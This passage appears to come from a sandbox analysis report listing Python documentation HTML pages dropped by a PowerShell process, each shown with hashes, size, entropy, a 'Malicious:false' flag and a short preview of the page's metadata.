                                                                                                                                                                                                              SSDEEP:384:GMWHMWjHqklKs2nhTMjbyn+NjiOAQOWR1JR3H6hkOpRNhin1TMj76zqWTC:iqyKblMj/NiOAQOWR1JhqIxMj762/
                                                                                                                                                                                                              MD5:ED7C32F6576B3920D4F3752BF69821DA
                                                                                                                                                                                                              SHA1:98FAD0275E0C3C6CD9B355E230EA94EDEF3A316E
                                                                                                                                                                                                              SHA-256:E885E78BE6C82AA52231420DD711E42E6AEA0ACCBCB2F541A8A8DBA81A656630
                                                                                                                                                                                                              SHA-512:CD83C14342EDCDCFD815F9D78DCEC55530B46242E5ACB3B1634EF7FF5FC0D072DD0E0DCB1582961A3D681D6DE11007C3B1C3C84CC85A2B2FC950D8CFCCEE2631
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="copy . Shallow and deep copy operations" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/copy.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/copy.py Assignment statements in Python do not copy objects, they create bindings between a target and an object. For collections that are mutable or contain mutable items, a copy ..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/copy.py Assignment statem
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (669), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):21963
                                                                                                                                                                                                              Entropy (8bit):4.858402338824843
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:taNaoZHqklSeInasTMUwbuir/z4J8n3yFv55fBL7CM7bonaCTMK76zqWTC:gqySTFMTLr/z4J8n3yFv5n7CM7URMK7Z
                                                                                                                                                                                                              MD5:602AE82BA2E8AA379CA1181C78C20C31
                                                                                                                                                                                                              SHA1:34525EFBF424FBC8AB716F11F8BB9B51D9BFB3FB
                                                                                                                                                                                                              SHA-256:E453ED163DAFD6EB6DF365B8457BA876994AC20CDC1CAC443F1D5756EE907425
                                                                                                                                                                                                              SHA-512:2A5B2152FEA8CF43E10C3049B534F72E9BE4F2C6F24A8D493229750EA2E0CA47ED5CE4B473C523B913ADDDC11C476835875A2D37ADE06C3AAE49B332AF36F1CE
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="copyreg . Register pickle support functions" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/copyreg.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/copyreg.py The copyreg module offers a way to define functions used while pickling specific objects. The pickle and copy modules use those functions when pickling/copying those obj..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/copyreg.py The cop
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (765), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):32723
                                                                                                                                                                                                              Entropy (8bit):4.918859959221578
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:AijqyghXMjCZRf9KgfkFdVL1070C+yFZ/VyFwmyF62AQUNQ7MY762/:AijqysMjeRf9KgfkFdVL1070vyFZ/Vy2
                                                                                                                                                                                                              MD5:DF7F7ED34FE880F42338910E7E4EC1FC
                                                                                                                                                                                                              SHA1:2F8C998719C1FDB686DB10F88F6818FC48C81800
                                                                                                                                                                                                              SHA-256:66F3C784AA09D5323C127D04B082FE4EEAF870B9C0859AE666C60B1E4C2D8B9B
                                                                                                                                                                                                              SHA-512:77CCEBD12D6B33F06C687EAB8D428CC5D57CA53BE3D426049D54A98F95F0A5CB81C8F4F88DE4C5F508E000E329139DFF311BB121BADB67B086AC4B59EF93531D
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="crypt . Function to check Unix passwords" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/crypt.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/crypt.py This module implements an interface to the crypt(3) routine, which is a one-way hash function based upon a modified DES algorithm; see the Unix man page for further detail..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/crypt.py This module im
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (373), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):17591
                                                                                                                                                                                                              Entropy (8bit):4.848837361016081
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:4gHqklgY08nJkTMlXtwV1e5yYZ0nJaTML76zqWTC:4UqygYZJqMlXtwV1e5yYqJ4ML762/
                                                                                                                                                                                                              MD5:A210E6C50A6596AD78EC21E2410FF514
                                                                                                                                                                                                              SHA1:B21DBD82979CC3848F2956B1C8353F64A7D5BA96
                                                                                                                                                                                                              SHA-256:FE1BA5FD86D4F209CB51300D25F683EBAEE669C04187C1B7FA19C63ABD6A7896
                                                                                                                                                                                                              SHA-512:E0FC383D017BBDF713924EB8D0C7B5C421B98E0971F39DF89C9378B30B8B44AF64B1923331130148DC285C0CED0AFCD01B83AE758803BF20EC1C4E37A0441C09
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Cryptographic Services" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/crypto.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="The modules described in this chapter implement various algorithms of a cryptographic nature. They are available at the discretion of the installation. On Unix systems, the crypt module may also be..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="The modules described in this chapter implement various alg
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1512), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):92441
                                                                                                                                                                                                              Entropy (8bit):4.826269652647928
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:CNBqy3PsXML0ZUy4yvTmwoNymodEo4goNymodyNTXbIf3UbhLWbkxcLHys4TyFCL:xqFHIu8YrSj5A
                                                                                                                                                                                                              MD5:F6141DB75AD731CB392D197B712A1EC4
                                                                                                                                                                                                              SHA1:606058335CE890FE045A19270B9372CCF2072E27
                                                                                                                                                                                                              SHA-256:9E0F4A71A92CB761A9851DFEAEAB0CC18BE8D40F7D190CEDE3A454F3EEA9ED1D
                                                                                                                                                                                                              SHA-512:FCE69470537CFBACC60AFFC1CDEAD821EF52AD7FA9D71E1097A5B4D7B3779175532EF8B46DC89CB7A577AD857B517A08410BAF99D2115B8DC84C86CDFEF9F982
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="csv . CSV File Reading and Writing" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/csv.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/csv.py The so-called CSV (Comma Separated Values) format is the most common import and export format for spreadsheets and databases. CSV format was used for many years prior to att..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/csv.py The so-called CSV (Comma
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (574), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):318249
                                                                                                                                                                                                              Entropy (8bit):4.792354110554765
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:Wqy7MXTG1VvxjTqtiF7cAEsXVsgD6R03kZoFdT5i/qwNNaOeJWwmBGvONz70hmF+:dqPG/mMZ5Wvl/QrIBZE3EQiKvBoLENLA
                                                                                                                                                                                                              MD5:274A8DD8DD0966396BB67E83C4DF8D66
                                                                                                                                                                                                              SHA1:225D146C847D0002B5D5DA02F476DB066B76D73C
                                                                                                                                                                                                              SHA-256:1619AE60E8822D652C82E91363B0629DB929D2DA5419DBB2933DF272A6229BE1
                                                                                                                                                                                                              SHA-512:AD81C26C31940475B648A9CC8964EBAB7D67A986D883F9AACBF4EFCAA65DFAE9CF90D5C95C0BBF833FA72F976582D0ACDE6000A38F3333037EF6E90FD2C1C892
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="ctypes . A foreign function library for Python" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/ctypes.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/ctypes ctypes is a foreign function library for Python. It provides C compatible data types, and allows calling functions in DLLs or shared libraries. It can be used to wrap these ..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/ctypes ctypes is
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (435), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):44383
                                                                                                                                                                                                              Entropy (8bit):4.856577869129049
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:IqyQ0LMyuwJV0K/UA/RxtyTcrc80kfS1OxJIJXfsvG9Vy/AAq3A2ZbBOIHfNrxFD:IqyzMyuwJV0K/UA/RxtyTcrc80kfS1OY
                                                                                                                                                                                                              MD5:60B1B620E9C2CA83DDC19AA6E083EAF2
                                                                                                                                                                                                              SHA1:8978CAD636D563FE5BCFFC9CE45F9DAFAC0F8896
                                                                                                                                                                                                              SHA-256:696FAB57F0E3280903C6BD145A5EA9A33BED50A98DCE2443A74FD29CF42F9539
                                                                                                                                                                                                              SHA-512:D80A40B71104B82AF334E0E338C4DBD80DBD216FF751A47967DA920498AC3A2C4DF747BF471C5410C4DA36F29AF3B17E4563848F223A5F1EDC0297B23CE7B770
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="curses.ascii . Utilities for ASCII characters" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/curses.ascii.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/curses/ascii.py The curses.ascii module supplies name constants for ASCII characters and functions to test membership in various ASCII character classes. The constants supplied are..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/curses/asci
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (677), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):280315
                                                                                                                                                                                                              Entropy (8bit):4.864283764007296
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3072:62WV7Tl7WA0742GU6P8HRv7Wi7WAiCFTF/A:6xNT3TP8HR//A
                                                                                                                                                                                                              MD5:008CB9CE3A71973EC535F2BC5DA9DFF1
                                                                                                                                                                                                              SHA1:AC4EE55CEA5EF555374274E5C434618770CC5965
                                                                                                                                                                                                              SHA-256:C259D4984DBD6C85DF85DE22A8A8DADA40ED3E28ADB2EFDF44BE78DE8524BC8C
                                                                                                                                                                                                              SHA-512:1A20F333ABD04A18A5047CF10410213A8BB856112254A1F0AD0EABA34F15BB0796DAB8A147DBDB22F5C16BFD4B68107181EC9B3FDD40F34C14EF37CCF6F4C07D
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="curses . Terminal handling for character-cell displays" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/curses.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/curses The curses module provides an interface to the curses library, the de-facto standard for portable advanced terminal handling. While curses is most widely used in the Unix en..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/curses T
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (460), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):25583
                                                                                                                                                                                                              Entropy (8bit):4.858392065250562
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:6qylWaMYlprcgYcd3uPI2IyGk6LlzEyZfj/gToe3qKX4UJe9vytoM5762/:6qy7MGprcgYcd3uw2IyGk6LlzEyZfj/K
                                                                                                                                                                                                              MD5:B8CE39B202546767E7705687EC86E713
                                                                                                                                                                                                              SHA1:3B8E675C8F696E2BC0720915F92C895931964645
                                                                                                                                                                                                              SHA-256:56E4938BA741731CC6B2BB87E4F392CE0EF6CDA07A4752B9E941F00BAFDCD49F
                                                                                                                                                                                                              SHA-512:92190E2C885133F6DCAFAC6A8AA917E572725B13D72226DCBD44DFC5051CFCB3855E3420E7451212A66FBB815E43A6FD8559640D556E96A172DCA6D15333E502
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="curses.panel . A panel stack extension for curses" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/curses.panel.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Panels are windows with the added feature of depth, so they can be stacked on top of each other, and only the visible portions of each window will be displayed. Panels can be added, moved up or dow..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Panels are windows with
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (495), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):14925
                                                                                                                                                                                                              Entropy (8bit):4.824662081614665
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:Vi6HqklLYNn7TMG4KmdDn3TMbU76zqWTC:BqyLafMPRjMA762/
                                                                                                                                                                                                              MD5:92818D0E9F9E01B36CCED8B5DE4D44C6
                                                                                                                                                                                                              SHA1:26B68A0DB8EA532F1FA08AC07F50485D6C6E2063
                                                                                                                                                                                                              SHA-256:D3842F2592ED2F7057E65A91B70BA7DFEE81772C55966EAB140C5C353D3FBF2B
                                                                                                                                                                                                              SHA-512:1A35D0C36720EDA85B726F8CCE40D92098795207B0FC86E0DADF755708B432CC5D84B921A3635CCCD549C22B4BD39F1A204AAC1DEF03973CB79A87572195DBAA
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Custom Python Interpreters" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/custominterp.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="The modules described in this chapter allow writing interfaces similar to Python.s interactive interpreter. If you want a Python interpreter that supports some special feature in addition to the Py..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="The modules described in this chapter allow wri
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (2440), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):131472
                                                                                                                                                                                                              Entropy (8bit):4.725234235370951
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:Nqyc6MTkBBdcjNJyTQyTdyTryYQyYRyYsyTuyYyyYhyYzZCZT/c1UnvTtnNSyjPD:HvZCZDGUvf6Pq0A
                                                                                                                                                                                                              MD5:7F159A1E90E9B2C17F36C2F78BC07B1E
                                                                                                                                                                                                              SHA1:ED814C18B82CE9357DD868A8E31131AFF3F48493
                                                                                                                                                                                                              SHA-256:7609CD4CAFEA93897504855BFC5D24285F31A3CE7195CB835B3364B2A0C95A1D
                                                                                                                                                                                                              SHA-512:77D23EE6DB1B1708A4EAA320F0BFCD0727B028E309F3797A2F2295D05984B314A99DA2D7F7AA160C9C882EE7FE8F98808E250BD1804FEE6C551B30E54245654F
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="dataclasses . Data Classes" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/dataclasses.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/dataclasses.py This module provides a decorator and functions for automatically adding generated special method s such as__init__() and__repr__() to user-defined classes. It was or..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/dataclasses.py This module prov
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (702), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):30823
                                                                                                                                                                                                              Entropy (8bit):4.8335101679279155
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:7GMHqklx+bnVTMtmgnruGkTWq6JB4hLYkvClzcGARS79nZTMj76zqWTC:DqyxMRMHc6bhNMj762/
                                                                                                                                                                                                              MD5:B4C2CBA99742A91E7BB5A96C21C72D0E
                                                                                                                                                                                                              SHA1:03BABAFAFF29B12872D7FD68A669800F3B1E9F65
                                                                                                                                                                                                              SHA-256:244FE07854B02AE60176E2281952D3FF70C1329933C30B104157C30DFC1F3ABD
                                                                                                                                                                                                              SHA-512:AB016D732EA8BCF044838C11B101A647B8CCB34C6B6544D68A0806E41B769D0D7EF88BEA5D4E327EA35443A4811887D2A59B9BE69C0A414B068D66C3BF480C0D
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Data Types" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/datatypes.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="The modules described in this chapter provide a variety of specialized data types such as dates and times, fixed-type arrays, heap queues, double-ended queues, and enumerations. Python also provide..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="The modules described in this chapter provide a variety of specializ
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1748), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):395497
                                                                                                                                                                                                              Entropy (8bit):4.767965093475774
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3072:zBU7zqvWz3sG41ex9Gx4RyI8rWAqrTrylA:zy7l34kx9U4RyrWAllA
                                                                                                                                                                                                              MD5:6AAF0BDE06600236A2CC8C463E40551F
                                                                                                                                                                                                              SHA1:4667E2F291F756F541B4E625F016181E22402034
                                                                                                                                                                                                              SHA-256:C3B176D804954DF15AABC69B9626FB339914C29391580EDAF9948CA16495B3C1
                                                                                                                                                                                                              SHA-512:E944A7BF63A47107AB42604F6921816CA3A399C6B862094E5860161334D0626F62F90BEDAC4FF41FB4A0B2C3C3871E63B4DAB6A9F41C7653A89495051C73FDCC
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="datetime . Basic date and time types" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/datetime.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/datetime.py The datetime module supplies classes for manipulating dates and times. While date and time arithmetic is supported, the focus of the implementation is on efficient attr..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/datetime.py The datetime
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (848), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):60046
                                                                                                                                                                                                              Entropy (8bit):4.890274489293564
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:gqycM9yyFVVpkVwOwZELadyVMyWxdqO7xEvD7VRLVdyVMyW/vM+an1qfH5sT7JMh:OZOWrdq7bFM+lP0MULZtRNbAVqA
                                                                                                                                                                                                              MD5:59EE03324BA8FE2ACC78445AAFD19A9B
                                                                                                                                                                                                              SHA1:89648EAA10EEE1368DDCBA00F098777849D2C009
                                                                                                                                                                                                              SHA-256:76E9DDB3524A8A6A7CF375285BAD7393CBAE6ACFC09283907DDD0F63D9386664
                                                                                                                                                                                                              SHA-512:39836A00744828B61318CBF74F20B26E5DD15BA62F4E4B7CCABF98838CA319C27A10031EB7D7A43B74FCC0C866D7A3C46DBF42F63F5392F315EBC4083B62D013
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="dbm . Interfaces to Unix .databases." />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/dbm.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/dbm/__init__.py dbm is a generic interface to variants of the DBM database . dbm.gnu or dbm.ndbm. If none of these modules is installed, the slow-but-simple implementation in modul..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/dbm/__init__.py dbm is
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (373), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):20243
                                                                                                                                                                                                              Entropy (8bit):4.853531884793781
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:Ir5rYHqklt89njTMnttE4xTn/TMH76zqWTC:DqytEXMnte4t7MH762/
                                                                                                                                                                                                              MD5:6F3A764B5FEE8F32147C2E948FEDE429
                                                                                                                                                                                                              SHA1:D70771A80ACC45C383440D085EBDC45DBBFE883A
                                                                                                                                                                                                              SHA-256:608EF8F5B8BB4E9C2B68A6CDC3C6BDEBB882A4950C96D1433B31A8E9BC2BBFAC
                                                                                                                                                                                                              SHA-512:3A63C22A8FA3A219FA23C712B4B4ACF0B08A4114C3DBBC685E435B80FE06FA527E07075F8EC1CD22E9934F28BC7BA8A34162A3B0FAA5BAAB3293AF4209D382F2
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Debugging and Profiling" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/debug.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="These libraries help you with Python development: the debugger enables you to step through code, analyze stack frames and set breakpoints etc., and the profilers run code and give you a detailed br..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="These libraries help you with Python development: the debug
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (772), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):286337
                                                                                                                                                                                                              Entropy (8bit):4.83651096037448
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:bqyxMRXHR5XFmtukoh5tqsPyDwyFTPcRaM9S/xxfbI20wyFBXJ0wyF60wyFghh0Y:WyhswO8Sa6RS5nIgSuA
                                                                                                                                                                                                              MD5:87410ED9F7E193F8C50B67018A057298
                                                                                                                                                                                                              SHA1:74A8D42F0DAB631C4C6E004A81303C99163F2F53
                                                                                                                                                                                                              SHA-256:6ED351A4185DAAA8B5E6FAD32D4EAD3C235E9E113EA1482C3C1D7EAC496B935E
                                                                                                                                                                                                              SHA-512:A59E545C54F61314181F6A58E8A84F4FE84D72BB7827337BF28B1BFABFFDCAEA926495A562C39002D15B46472DB0E5FE4801FE047D77C392117A66ADA92FECA7
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="decimal . Decimal fixed point and floating point arithmetic" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/decimal.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/decimal.py The decimal module provides support for fast correctly rounded decimal floating point arithmetic. It offers several advantages over the float datatype: Decimal .is based..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
